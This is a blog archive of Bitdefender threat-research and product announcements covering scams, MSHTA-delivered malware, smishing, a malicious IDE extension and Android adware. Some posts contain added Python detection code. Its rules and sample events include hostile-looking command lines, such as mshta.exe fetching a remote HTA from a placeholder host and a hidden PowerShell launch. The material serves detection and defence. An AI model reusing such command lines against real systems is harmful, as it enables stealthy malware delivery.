Archive for Bitdefender

Bitdefender Releases 2026 Global Scam Intelligence Report

Posted in Commentary with tags on June 9, 2026 by itnerd

Bitdefender today released the Bitdefender 2026 Global Scam Intelligence Report, a comprehensive analysis of the global scam landscape over a 12-month period. The report examines how scams have evolved into a sophisticated, cross-platform criminal industry, revealing the tactics, channels, and behavioral patterns that fraudsters use to target consumers worldwide.

Online scams and fraud continue to escalate at an alarming rate. Losses due to scams globally have reached nearly half a billion US dollars in 2025 alone. Bitdefender’s independent global survey of 7,000 consumers reinforces the severity of the problem with 1 in 7 (14%) reporting falling victim to a scam in the past year, a finding that confirms scams as not merely a cybersecurity issue, but a serious threat to consumers’ financial security and digital identity.

The Bitdefender 2026 Global Scam Intelligence Report is built from real-time insights spanning trillions of URLs, billions of messages, live ad ecosystems, call honeypots, and direct consumer submissions. This telemetry captures scam activity as it happens, tracking campaigns across platforms and documenting attacker behavior in motion. The result is a field report that gives both consumers and the security community a comprehensive, data-driven view of how scams operate at scale.

Key findings include:

  • Younger generation is highly targeted – Younger consumers are now twice as likely to fall victim to scams as older generations, with a victimization rate of 20% compared to 9.7% among those 55 and older. Scammers have followed their audience to the social platforms, gaming environments, and messaging apps where younger users spend the most time.
  • 1 in 20 text messages shows signs of fraud – Extensive analysis of SMS traffic found that 5.2% of all messages analyzed (roughly 1 in 20) exhibited characteristics consistent with scam infrastructure or coordinated fraud activity. For a communication channel people inherently trust, that exposure rate is a serious cause for concern.
  • Voice calls remain a high-yield fraud channel – Bitdefender analyzed nearly 150 million incoming calls during the reporting period. More than 23 million were classified as unwanted, meaning about 1 in 6 calls reaching protected devices was deemed fraudulent or unsolicited. The system processed more than 52 million unique phone numbers, with over half a million flagged as unwanted.
  • Finance scams dominate across every channel – Investment fraud, banking phishing, and crypto-themed scams appear consistently across SMS, social ads, WhatsApp, voice calls, and email. The lure changes with the platform, but the objective remains constant: quickly move the victim toward a financial decision before skepticism has a chance to intervene.

To download a complimentary copy of the Bitdefender 2026 Global Scam Intelligence Report, visit here.

Microsoft’s Legacy MSHTA Utility Tool Abused in Attacks, Exploited to Deliver Malware

Posted in Commentary with tags on May 19, 2026 by itnerd

Bitdefender has released new research documenting how attackers continue to abuse Microsoft’s legacy MSHTA utility to deliver malware through stealthy, multi-stage attack chains. The abuse of MSHTA affects both businesses and consumers who run Windows.

Despite Internet Explorer reaching end of support years ago, MSHTA remains enabled by default on Windows systems and continues to be heavily exploited by cybercriminals to execute malicious scripts, retrieve remote payloads, and evade detection using trusted Microsoft-signed processes.

Key findings include:

  • MSHTA used to silently deliver multiple malware families, including LummaStealer, Amatera, ClipBanker, PurpleFox, and CountLoader
  • Multi-stage, fileless attack chains using HTA scripts, PowerShell, and in-memory payloads to bypass traditional detection tools
  • Use of ClickFix-style lures and fake software downloads designed to trick users into manually launching malware infections

The research highlights how legacy Windows utilities continue to pose risks to general users and organizations by providing attackers with trusted tools that blend malicious activity into legitimate system behavior.

You can read the research here: https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows

UPDATE: Adrian Culley, Senior Sales Engineer at SafeBreach, has this comment:

Adrian has extensive global cyber investigations experience, including technical roles at SafeBreach, Trellix, Palo Alto Networks, Norse, and the London Metropolitan Police Service.

“Reporting this week of a fresh surge in malware campaigns abusing mshta.exe should surprise nobody who has spent any time on the offensive side of the trade. The Windows utility has been shipping for 26 years, it is signed by Microsoft, it runs script in a trusted process context, and it is allow-listed by default in most enterprise estates. From APT28 to FIN7, from MuddyWater to whichever commodity loader is fashionable this month, attackers reach for it for the same reason burglars reach for unlocked doors.

There is no patch for this, because mshta is working as designed. What isn’t working is the quiet assumption — held in nearly every security organisation I walk into — that the AppLocker rule, the ASR policy, the EDR behavioural detection written eighteen months ago all still fire today. Estates drift. Exceptions accumulate. Rules quietly degrade. And almost no defender can prove, on demand, that they don’t.

The fix isn’t another product. It’s a discipline: safely run the attack on your own production estate, on a continuous schedule, and watch your stack respond. Replace “we believe we’re covered” with “we proved we are.”

Anything less is exposure management by hope.”
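The HTA-to-PowerShell chain in the findings above, and Culley's point that a rule written eighteen months ago has to be proved to still fire, can both be exercised with a few process-creation heuristics. The following is an added example written for this page, not Bitdefender's or SafeBreach's code: it runs two detection rules over constructed process events (the fields mirror a Sysmon Event ID 1 record, but every path, hostname and command line is made up) and reports which known-bad samples no rule caught, which is the regression check a defender would schedule.

```python
"""Detection heuristics for mshta.exe abuse, run over constructed process-
creation events. Added example, not Bitdefender's research code; the event
shape (image, parent image, command line) is what a Sysmon Event ID 1 or EDR
process record carries, but every record below is invented."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str          # path of the newly created process
    parent_image: str   # path of the parent process
    command_line: str


# A remote URL, a UNC path or an inline script protocol on the mshta.exe
# command line means no local .hta file is involved at all.
REMOTE_OR_INLINE = re.compile(r"(https?://|\\\\[^\s\\]+\\|\b(?:javascript|vbscript):)", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_remote_or_inline_hta(ev: ProcessEvent):
    if basename(ev.image) == "mshta.exe" and REMOTE_OR_INLINE.search(ev.command_line):
        return "mshta.exe launched with a remote URL, UNC path or inline script"
    return None


def rule_mshta_spawns_script_host(ev: ProcessEvent):
    if basename(ev.parent_image) == "mshta.exe" and basename(ev.image) in SCRIPT_HOSTS:
        return f"mshta.exe spawned {basename(ev.image)} (second stage of an HTA chain)"
    return None


RULES = (rule_remote_or_inline_hta, rule_mshta_spawns_script_host)


def evaluate(events):
    """Return {pid: [reasons]} for every event at least one rule fires on."""
    findings = {}
    for ev in events:
        reasons = [reason for r in RULES if (reason := r(ev))]
        if reasons:
            findings[ev.pid] = reasons
    return findings


# Constructed samples, each paired with whether a defender expects an alert.
SAMPLES = [
    (ProcessEvent(101, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                  r'mshta.exe "C:\Program Files\Vendor\Setup\wizard.hta"'), False),
    (ProcessEvent(102, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                  "mshta.exe https://cdn.example.invalid/update.hta"), True),
    (ProcessEvent(103, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  r"C:\Windows\System32\mshta.exe",
                  'powershell.exe -NoProfile -WindowStyle Hidden -Command "<stage-2 placeholder>"'), True),
    (ProcessEvent(104, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                  "mshta.exe javascript:<inline script placeholder>"), True),
    (ProcessEvent(105, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
                  "cmd.exe /c dir"), False),
]


def coverage_report(samples=SAMPLES):
    """Regression check in the spirit of 'prove the rule still fires': which
    known-bad samples produced no alert, and which benign ones did."""
    findings = evaluate([ev for ev, _ in samples])
    missed = [ev.pid for ev, bad in samples if bad and ev.pid not in findings]
    noisy = [ev.pid for ev, bad in samples if not bad and ev.pid in findings]
    return {"alerts": findings, "missed": missed, "false_positives": noisy}


if __name__ == "__main__":
    for key, value in coverage_report().items():
        print(key, value)
```

Running the block prints the alerts for samples 102, 103 and 104 and empty `missed` and `false_positives` lists; feeding the same known-bad samples through a rule set on a schedule is what turns "we believe we're covered" into evidence, and the `missed` list is the drift signal.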

New Bitdefender Research Exposes Global Transportation Smishing Campaign

Posted in Commentary with tags on April 30, 2026 by itnerd

Bitdefender has released new research on a large-scale global smishing campaign targeting consumers with fake toll, parking, and traffic fine-themed messages designed to steal money and personal information or remotely control devices. The campaign remains active across 12 countries.

Researchers identified more than 79,000 fraudulent text messages and over 31,900 malicious URLs, using techniques such as sender ID spoofing, rotating domains, and masked links to evade detection.

The messages impersonate trusted transport authorities and pressure victims into making payments through fake websites or, in many cases, installing malware.

Key takeaways from the research:

  • Over 79,000 fraudulent messages have already been detected in 40 distinct SMS scam campaigns
  • The scams impersonate DMVs, toll operators, and parking authorities from all over the world
  • Victims are redirected to fake payment sites or, in some cases, malware downloads
  • The campaign's infrastructure is characterized by rapid domain generation, sender-ID spoofing, and multiple evasion techniques targeting mobile operating systems

You can read further into this campaign here.
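The evasion techniques listed above (sender-ID spoofing, rotating domains, masked links) translate directly into triage heuristics. The block below is an added example, not Bitdefender's detection code: it scores constructed SMS records by whether a toll, parking or DMV-themed message links to a registrable domain outside a hypothetical operator allow-list, puts a brand keyword in the subdomain of an unrelated domain, uses deadline or penalty language, or arrives from an alphanumeric sender ID. The registrable-domain helper takes the last two labels, a simplification of the Public Suffix List rule, and the allow-list, sender IDs and message bodies are all invented.

```python
"""Triage heuristics for toll/parking/DMV-themed smishing, run over constructed
SMS records. Added example, not Bitdefender's detection logic: the operator
allow-list, sender IDs and message bodies are invented."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Sms:
    sender: str   # as displayed on the handset: a number, a short code or an alphanumeric ID
    body: str


# Bare or scheme-prefixed hostnames, with an optional path.
URL_RE = re.compile(r"\b(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(/\S*)?", re.I)
BRAND_WORDS = ("dmv", "toll", "parking", "traffic")
URGENCY_RE = re.compile(r"(final notice|within \d+ hours?|suspend|late fee|penalt|immediately)", re.I)
# Hypothetical allow-list of legitimate operator domains (registrable domain only).
KNOWN_OPERATORS = {"dmv.example", "tollroads.example"}


def registrable_domain(host: str) -> str:
    """Last two labels of the hostname. Simplification: a real implementation
    consults the Public Suffix List so that e.g. 'co.uk' is not treated as a domain."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def triage(msg: Sms) -> dict:
    reasons, score = [], 0
    themed = any(w in msg.body.lower() for w in BRAND_WORDS)
    for m in URL_RE.finditer(msg.body):
        host = m.group(1).lower()
        reg = registrable_domain(host)
        if reg in KNOWN_OPERATORS:
            continue
        if themed:
            score += 2
            reasons.append(f"transport-themed message links to {reg}, not a known operator domain")
        # "dmv.roadpay-secure.invalid": the brand word is only a subdomain of an unrelated domain
        subdomain = host[: -len(reg)].rstrip(".")
        if any(w in subdomain for w in BRAND_WORDS):
            score += 2
            reasons.append(f"brand keyword used as a subdomain of {reg}")
    if URGENCY_RE.search(msg.body):
        score += 1
        reasons.append("deadline or penalty language")
    # Alphanumeric sender IDs are display text chosen by the sender; the handset cannot verify them.
    if themed and not msg.sender.lstrip("+").isdigit():
        score += 1
        reasons.append(f"alphanumeric sender ID {msg.sender!r}")
    return {"score": score, "verdict": "suspicious" if score >= 3 else "ok", "reasons": reasons}


SAMPLES = [  # constructed messages
    Sms("+15550100", "Your DMV renewal statement is ready at https://dmv.example/notices"),
    Sms("DMV", "FINAL NOTICE: unpaid toll of $6.99. Pay within 24 hours to avoid a late fee: "
               "https://dmv.roadpay-secure.invalid/pay"),
    Sms("78901", "Parking fine outstanding. Settle now at parking-fees.invalid/pay or your "
                 "registration may be suspended."),
    Sms("Sam", "Lunch at 1? Menu is at https://cafe.example/menu"),
]


def triage_all(msgs=SAMPLES):
    return [{"sender": m.sender, **triage(m)} for m in msgs]


if __name__ == "__main__":
    for row in triage_all():
        print(row["sender"], row["verdict"], row["score"], "; ".join(row["reasons"]))
```

The third sample matters: it comes from a numeric short code and uses no subdomain trick, yet still scores as suspicious because a parking-fine message points at a domain no operator owns. The registrable domain, not the sender field or the words in the hostname, is the one thing the scammer cannot spoof once the allow-list is right.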

Bitdefender Launches Powerful Email Security Solution for Businesses and MSPs

Posted in Commentary with tags on April 15, 2026 by itnerd

Bitdefender today announced Bitdefender GravityZone Extended Email Security, unifying email and endpoint protection within a single platform. Built for organizations, managed service providers (MSPs) and their customers, it leverages an Integrated Cloud Email Security (ICES) approach to deliver continuous protection before and after delivery against modern email-borne threats including phishing, business email compromise (BEC), ransomware, impersonation, and insider-driven attacks.

“Email threats are growing more sophisticated and effective as total business email compromise-related payments crossed the $6 billion threshold in 2024”, according to Gartner®.¹ In a global survey of 1,200 IT and security professionals, 42% identified BEC as the greatest threat to their organization, while 66% reported an increase in these types of attacks.

Legacy email security solutions often focus on pre-delivery filtering, leaving gaps once threats reach user inboxes. Siloed email and endpoint security tools further create blind spots attackers exploit, increasing dwell time and delaying detection.

Bitdefender GravityZone Extended Email Security is a native email security solution that closes this gap by combining secure email gateway (SEG) filtering with API-based post-delivery protection. This dual-layer approach stops threats before delivery and continuously detects and remediates them after they reach inboxes, helping ensure complete protection across the email threat lifecycle. The solution builds on technology gained through Bitdefender’s acquisition of Mesh Security, further strengthening its email protection capabilities.

Fully integrated into Bitdefender GravityZone, the company’s unified security, risk analytics, and compliance platform, GravityZone Extended Email Security extends protection from endpoint to inbox. It integrates seamlessly into existing environments, enabling rapid deployment and time to value.

Key Benefits of GravityZone Extended Email Security include:

  • Unified email and endpoint protection – GravityZone Extended Email Security uses artificial intelligence (AI) and real-time threat intelligence to stop phishing, BEC, impersonation, ransomware, and other advanced threats. Emails are inspected before delivery and continuously monitored after delivery, enabling automated quarantine and remediation to reduce dwell time and limit user exposure.
  • Consolidates tools and reduces security team workload – The platform streamlines security management by unifying tools and automating detection and response across the email attack chain. Continuous monitoring and automated remediation reduce manual effort and improve response times.
  • Improves efficiency and scales security operations – Built for modern environments and service delivery models, GravityZone Extended Email Security enables efficient, scalable security for businesses and MSPs. Centralized management, continuous policy enforcement, and streamlined workflows support multi-tenant environments and simplify security across distributed infrastructures.
  • Fast, flexible deployment across any environment – Organizations and MSPs can deploy the solution as a SEG across Microsoft 365, hybrid, and diverse environments, with API-based and combined deployment models supported for Microsoft 365.

Availability

Bitdefender GravityZone Extended Email Security is available now as an add-on to GravityZone endpoint security deployments. For more information, visit here.

¹Gartner, How to Develop an Email Security Strategy, Max Taggett, Nikul Patel, August 20, 2025.

Gartner is a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved.

Bitdefender Launches Complimentary Internal Attack Surface Assessment

Posted in Commentary with tags on March 31, 2026 by itnerd

Bitdefender, a global cybersecurity leader, today announced the Bitdefender Attack Surface Assessment, a complimentary evaluation that helps organizations identify and reduce hidden internal cyber risk caused by unnecessary user access to applications, tools, and operating system utilities commonly exploited in modern attacks. The assessment gives organizations a clear, data-driven view of their internal attack surface and provides actionable guidance to help prioritize and remediate exposure.

Businesses face growing challenges defending against Living-Off-the-Land (LOTL), fileless, and other non-malware attack techniques, which leverage legitimate operating system tools and trusted applications to breach systems and evade detection while blending into normal activity.

Analysis of more than 700,000 real-world security incidents found that legitimate tools and LOTL techniques are involved in more than 84% of major attacks. Cybercriminals increasingly exploit widely available utilities such as PowerShell, WMIC, and others to gain access, escalate privileges and move laterally within environments undetected. As a result, organizations are being forced to shift toward a prevention-first security posture to proactively close attack paths before they can be exploited.

The Bitdefender Attack Surface Assessment addresses this critical security gap through a guided engagement that helps organizations uncover this largely invisible internal exposure, assess its impact on overall risk and identify practical steps for remediation. Organizations enroll and immediately begin assessing and monitoring their environment with no disruption to employees or daily operations.

The program is powered by Bitdefender GravityZone PHASR (Proactive Hardening and Attack Surface Reduction), a first-to-market endpoint security innovation that combines dynamic, behavior-based security hardening with real-time threat intelligence. It helps identify excessive user access and restrict or block unnecessary applications and tools without impacting business operations.

Key Benefits of the Attack Surface Assessment include:

  • Quantify internal risk at the user level – Gain precise visibility into attack surface exposure down to each user, including access to applications, tools and utilities, mapped against their baseline behavior and real-time threat intelligence.
  • Identify shadow IT and unauthorized tools – Uncover shadow IT and unauthorized tools, including unusual network activity, access to non-approved binaries, and unrecognized applications attempting to access company resources.
  • Reduce the attack surface using actionable insights – Receive actionable recommendations to focus mitigation and begin hardening the internal attack surface, with the option to apply controls manually or automatically with Bitdefender guidance. Organizations can reduce their attack surface by up to 95%, significantly lowering exposure to modern attack techniques.

Availability

The Bitdefender Attack Surface Assessment is a complimentary, 45-day turnkey program that requires minimal effort and is available now for organizations with 250 or more employees. To learn more or enroll, visit here.

Bitdefender Research Shows 130% Increase in Attacks Targeting Gulf Countries

Posted in Commentary with tags on March 25, 2026 by itnerd

Bitdefender has released new research revealing that phishing and malware campaigns targeting Gulf countries have surged by approximately 130% on average following the escalation of the war in Iran.

Researchers observed a sustained spike in malicious email activity beginning February 28, with campaigns quickly doubling and peaking at nearly four times pre-war levels.

Key findings:

  • Threat actors are delivering a mix of remote access trojans, spyware, and fileless attacks that execute in memory
  • The attacks rely heavily on business-themed lures, including invoices, contracts, banking communications, and delivery notifications
  • No confirmed state-sponsored attribution; however, phishing is often a precursor to more complex attacks, enabling initial access to targeted environments.

You can read the research here: https://www.bitdefender.com/en-gb/blog/hotforsecurity/gulf-countries-phishing-surge

Windsurf IDE Extension Drops Malware via Solana Blockchain Targeting Developers In The Process

Posted in Commentary with tags on March 18, 2026 by itnerd

Bitdefender has released research warning of an active attack using a malicious extension for the Windsurf IDE (integrated development environment). The campaign intentionally targets software developers, who typically have privileged access, API keys, and other high-value credentials.

Disguised as a legitimate R programming language tool, the extension installs a multi-stage NodeJS credential stealer that retrieves encrypted payloads from the Solana blockchain, leveraging legitimate third-party infrastructure instead of traditional command-and-control (C2) servers to evade detection.

Cybercriminals are increasingly abusing trusted developer ecosystems and decentralized infrastructure to plant malware and establish persistence.

You can read the research here: https://www.bitdefender.com/en-us/blog/labs/windsurf-extension-malware-solana

New Research Reveals Cybercriminals Love Valentine’s Day: 41% of all Valentine’s Day Spam Observed Malicious Intent

Posted in Commentary with tags on February 12, 2026 by itnerd

Bitdefender has released new findings showing that Valentine’s Day–themed spam has spiked in recent weeks, using the promise of love, discounts, and gifts from popular brands such as Dior, Sephora, and Walmart as lures.

41% of all Valentine’s Day spam observed had deceptive or malicious intent. Common tactics used to snare victims included phishing attempts, dating scams, fake giveaways, advance-fee schemes, and misleading surveys.

Findings include:

  • The U.S. was the most targeted destination at 55%, followed by Germany (13%), Ireland (8%), and the UK (6%).
  • The U.S. also ranked as the top source, responsible for over 43% of Valentine’s-related spam.
  • About 10% of scam-related messages used dating-themed lures, often relying on AI-generated profile images

You can get more details here: https://www.bitdefender.com/en-us/blog/hotforsecurity/nearly-4-in-10-valentines-day-emails-are-scams-what-bitdefender-antispam-lab-is-seeing-in-2026

A threat actor named “RedCurl” has created ransomware to encrypt Hyper-V servers

Posted in Commentary with tags on March 26, 2025 by itnerd

A threat actor named ‘RedCurl,’ known for stealthy corporate espionage operations since 2018, is now using a ransomware encryptor designed to target Hyper-V virtual machines. This is what Bitdefender had to say:

This research, conducted by Bitdefender Labs, presents the first documented analysis of a ransomware campaign attributed to the RedCurl group (also known as Earth Kapre or Red Wolf). RedCurl has historically maintained a low profile, relying heavily on Living-off-the-Land (LOTL) techniques for corporate cyber espionage and data exfiltration. This shift to ransomware marks a significant evolution in their tactics.

This new ransomware, which we have named QWCrypt based on a self-reference ‘qwc’ found within the executable, is previously undocumented and distinct from known ransomware families.

Roger Grimes, Data-Driven Defense Evangelist at KnowBe4, commented:

“While targeting Microsoft Hyper-V servers is nothing new (example: https://cybercx.com/blog/akira-ransomware/), this indicates an increased focus on Hyper-V and virtualization platforms in general. It’s actually far easier to bring down an organization using an enterprise virtualization platform than one with hundreds of disparate, separately located on-premise servers. If I get on your VM host server, now, with one compromise, I can more easily control and manipulate the whole kingdom. I can more easily encrypt entire servers. I can more easily exfiltrate large amounts of sensitive data. I can more easily corrupt backup services. It’s not good. But the question you need to ask is how the bad guy got to your VM host servers in the first place? Was it social engineering? Was it unpatched software or firmware? Was it stolen logon credentials or bypassed phishable MFA? Because those are the most likely reasons and if you don’t figure those out your environment is not going to be safe no matter what else you do.”

Bitdefender Anomaly Detection Finds 60k Apps Secretly Installing Adware

Posted in Commentary with tags on June 7, 2023 by itnerd

Using an anomaly detection feature that was added to its Mobile Security software, Bitdefender detected over 60,000 malicious Android apps disguised as legitimate applications that have been installing adware for the last 6 months.
 
The global campaign that predominantly targets US users is believed to have started in October 2022 and is being distributed as fake security software, game cracks, cheats, VPN software, Netflix, and utility apps on third-party sites, where malware inspection isn’t as strong.
 
When the app is installed and launched, it will display an error message stating that the “Application is unavailable in your region. Tap OK to uninstall,” but actually, the app is not uninstalled and instead sleeps for two hours before registering two ‘intents’ that cause the app to launch when the device is booted or unlocked. Bitdefender says the latter intent is disabled for the first 2 days, which helps evade detection.
 
The app then reaches out to the attackers’ servers and retrieves advertisement URLs to be displayed in the mobile browser or as a full-screen WebView ad.
 
“However, the threat actors involved can easily switch tactics to redirect users to other types of malware, such as banking Trojans to steal credentials and financial information or ransomware,” warns Bitdefender.
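The behaviour described above (a fake "uninstall" dialog, a two-hour sleep, boot and unlock receivers registered afterwards, then remote ad URLs loaded into a full-screen WebView) is a timeline, and a defender can correlate it as one. The block below is an added example, not Bitdefender's anomaly detector: it parses constructed device telemetry (the log format, package names and hostnames are invented), flags a package when several of those steps line up, and reports how long the app stayed dormant, which is the number a sandbox run has to outlast.

```python
"""Timeline correlation for dormant adware behaviour, run over constructed
device telemetry. Added example, not Bitdefender's anomaly detector; the log
format, package names and hostnames are invented."""
from collections import defaultdict
from datetime import datetime, timedelta

PERSISTENCE_INTENTS = {"android.intent.action.BOOT_COMPLETED",
                       "android.intent.action.USER_PRESENT"}

# Constructed telemetry: "<ISO timestamp> <package> <event> [detail]" per line.
TELEMETRY = """\
2023-05-01T10:00:00Z com.example.fakevpn INSTALL
2023-05-01T10:00:30Z com.example.fakevpn LAUNCH
2023-05-01T10:00:31Z com.example.fakevpn DIALOG Application is unavailable in your region. Tap OK to uninstall
2023-05-01T10:00:35Z com.example.fakevpn ACTIVITY_FINISH
2023-05-01T12:00:36Z com.example.fakevpn REGISTER_RECEIVER android.intent.action.BOOT_COMPLETED
2023-05-01T12:00:36Z com.example.fakevpn REGISTER_RECEIVER android.intent.action.USER_PRESENT
2023-05-02T08:15:00Z com.example.fakevpn NET_CONNECT ads.example.invalid
2023-05-02T08:15:02Z com.example.fakevpn WEBVIEW_FULLSCREEN https://ads.example.invalid/r/1
2023-05-01T10:05:00Z com.example.notes INSTALL
2023-05-01T10:05:10Z com.example.notes LAUNCH
2023-05-01T10:05:12Z com.example.notes NET_CONNECT sync.example
2023-05-01T10:06:00Z com.example.notes ACTIVITY_FINISH
"""


def parse(text):
    """Group events per package, sorted by time, as (datetime, kind, detail)."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pkg, kind, *rest = line.split(" ", 3)
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events[pkg].append((when, kind, rest[0] if rest else ""))
    return {pkg: sorted(evs) for pkg, evs in events.items()}


def assess(pkg_events, dormancy=timedelta(hours=1)):
    """Flag a package when several steps of the pattern line up."""
    reasons, launch, ui_finished = [], None, False
    claimed_uninstall = uninstalled = False
    registered = set()
    for when, kind, detail in pkg_events:
        if kind == "LAUNCH" and launch is None:
            launch = when
        elif kind == "ACTIVITY_FINISH":
            ui_finished = True
        elif kind == "DIALOG" and "uninstall" in detail.lower():
            claimed_uninstall = True
        elif kind == "UNINSTALL":
            uninstalled = True
        elif kind == "REGISTER_RECEIVER" and detail in PERSISTENCE_INTENTS:
            registered.add(detail)
            if launch is not None and when - launch >= dormancy:
                reasons.append(f"{detail.rsplit('.', 1)[-1]} registered {when - launch} after launch")
        elif kind == "WEBVIEW_FULLSCREEN" and ui_finished:
            reasons.append("full-screen WebView opened with no activity in the foreground")
    if claimed_uninstall and not uninstalled:
        reasons.append("told the user it would uninstall but stayed installed")
    if registered == PERSISTENCE_INTENTS:
        reasons.append("both boot and unlock receivers registered")
    return {"suspicious": len(reasons) >= 3, "reasons": reasons}


def dormancy_seconds(pkg_events):
    """Seconds from first LAUNCH to the first persistence or network activity:
    how long a sandbox run has to last before this app shows anything."""
    launch = next((w for w, k, _ in pkg_events if k == "LAUNCH"), None)
    active = next((w for w, k, d in pkg_events
                   if k == "NET_CONNECT" or (k == "REGISTER_RECEIVER" and d in PERSISTENCE_INTENTS)), None)
    if launch is None or active is None:
        return None
    return (active - launch).total_seconds()


def report(text=TELEMETRY):
    return {pkg: {**assess(evs), "dormancy_s": dormancy_seconds(evs)}
            for pkg, evs in parse(text).items()}


if __name__ == "__main__":
    for pkg, result in report().items():
        print(pkg, result)
```

For the constructed adware package the dormancy comes out at 7206 seconds, just over the two hours the article mentions, so any dynamic-analysis window shorter than that sees only a harmless-looking app that asked to be uninstalled. The benign notes app touches the network two seconds after launch and trips none of the correlations.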

Ted Miracco, CEO, Approov Mobile Security had this to say:

“The discovery of these malicious Android apps raises concerns about how easy it is to distribute malware and the fact that this campaign predominantly targets users in the United States is concerning, as it suggests that a large number of individuals may be at risk. This highlights the need for robust security measures, like app attestation to protect users from such threats. It also serves as a reminder for users to exercise caution when downloading and installing applications, particularly from unofficial sources.”


Dave Ratner, CEO, HYAS follows up with this:

“The identification of beaconing behavior to adversary infrastructure via Protective DNS is not only for laptops and servers; the explosion of mobile-based malware highlights just how important it is to extend Protective DNS across all connected devices. Bad actors will continue to find innovative ways to trick users but having the visibility to see the anomalous communication reaching out to the adversary’s servers, and the ability to block it, provides a key layer of defense that is critical in today’s world.”

The fact that these Android apps are out there should send a chill down the spine of every Android user. It means to me that Google, as well as users of Android phones, really need to have their heads on a swivel to make sure that this doesn’t become an extremely popular attack vector.